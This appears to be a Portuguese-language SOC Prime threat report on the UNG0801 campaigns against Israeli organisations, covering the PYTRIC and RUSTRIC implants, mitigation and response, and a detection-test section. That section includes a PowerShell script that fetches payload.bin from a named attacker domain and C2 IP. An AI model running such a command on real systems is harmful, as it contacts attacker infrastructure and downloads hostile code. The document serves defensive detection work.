SOC Prime Bias: Crítico

30 Dec 2025 13:40 UTC

UNG0801: Atividade de Ameaça Direcionada a Israel Impulsionada por Falsificação de Ícone de AV

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
UNG0801: Atividade de Ameaça Direcionada a Israel Impulsionada por Falsificação de Ícone de AV
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O relatório descreve duas campanhas conectadas que utilizam documentos PDF e Word maliciosos para entregar cargas úteis que imitam ícones de antivírus e têm como alvo organizações israelenses. Um caminho instala o PYTRIC, um implante Python empacotado com PyInstaller, enquanto o outro entrega o RUSTRIC, um implante baseado em Rust lançado por meio de um documento Word com macro habilitada. Ambas as cargas coletam detalhes do host, executam comandos do sistema e investigam software de segurança instalado; o PYTRIC inclui, adicionalmente, funcionalidades destrutivas. A entrega é impulsionada por anexos phishing direcionados e links hospedados na nuvem (incluindo Dropbox), com uso do Telegram para comando e controle.

Investigação

O SEQRITE Labs analisou as iscas de phishing iniciais, extraiu macros incorporadas e reconstruiu a cadeia de carga útil instalada. O PYTRIC foi confirmado como um pacote PyInstaller com rotinas de descoberta de arquivos e apagamento, e os analistas observaram credenciais de bot do Telegram associadas ao Backup2040. O RUSTRIC foi caracterizado como um binário Rust que verifica vinte e oito produtos antivírus e aciona uma carga útil codificada em hexadecimal usando o WMI. A análise de infraestrutura conectou a entrega a um link Dropbox e a um domínio que resolve para um endereço IP anteriormente vinculado a netvigil.org.

Mitigação

Treine os usuários para tratarem anexos de PDF e Word não solicitados com cautela—especialmente arquivos apresentados como ferramentas de segurança ou utilitários relacionados a antivírus. Configure a segurança de e-mails para bloquear documentos com macros e para sinalizar ou restringir URLs que apontem para hosts de armazenamento em nuvem usados para entrega de cargas úteis. Nos endpoints, monitore a execução de PyInstaller, criação de processos WMI incomuns e invocações suspeitas de utilitários embutidos, como whoami, hostname e nslookup. Bloquear domínios e IPs maliciosos identificados pode interromper ainda mais o caminho da infecção.

Resposta

Se a atividade for detectada, isole o sistema afetado, preserve dados voláteis e colete os documentos maliciosos para triagem baseada em hash. Interrompa quaisquer processos gerados pelo WMI suspeitos e remova cargas úteis instaladas de locais comuns de preparo, como a pasta de Downloads. Realize validação forense para atividades de exclusão ou apagamento de arquivos, redefina credenciais potencialmente expostas e monitore comunicações subsequentes de C2 do Telegram.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria e Linha de Base deve ter passado.

Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa de Ataque & Comandos:
    O adversário pré-registrou o domínio stratioai.org e o configurou para resolver para 159.198.68.25 (um servidor VPS comprometido). Usando um comando PowerShell de uma linha, eles iniciam um beacon C2 que baixa uma pequena carga útil e então mantém uma shell reversa persistente. A conexão de saída é feita sobre HTTPS (porta 443) para se misturar ao tráfego normal, mas os logs do firewall registram o IP de destino e a consulta DNS, satisfazendo a regra sigma.

  • Script de Teste de Regressão:

    # -------------------------------------------------
    # Beacon C2 simulado para validação de detecção
    # -------------------------------------------------
    # 1. Resolva o domínio malicioso (força consulta DNS)
    $maliciousDomain = "stratioai.org"
    $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain)
    Write-Host "Resolved $maliciousDomain to $($resolved -join ', ')"
    
    # 2. Estabeleça conexão HTTPS com o IP malicioso (C2)
    $maliciousIP = "159.198.68.25"
    $url = "https://$maliciousDomain/payload.bin"
    
    try {
        $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10
        Write-Host "C2 request succeeded, size: $($response.ContentLength) bytes"
    } catch {
        Write-Error "C2 request failed: $_"
    }
    
    # 3. OPCIONAL: Mantenha o canal aberto por 30 segundos
    Start-Sleep -Seconds 30
    # -------------------------------------------------
  • Comandos de Limpeza:

    # Remova quaisquer arquivos temporários (nenhum criado neste script)
    # Limpe o cache DNS para evitar reutilização acidental
    ipconfig /flushdns
    Write-Host "Limpeza completa."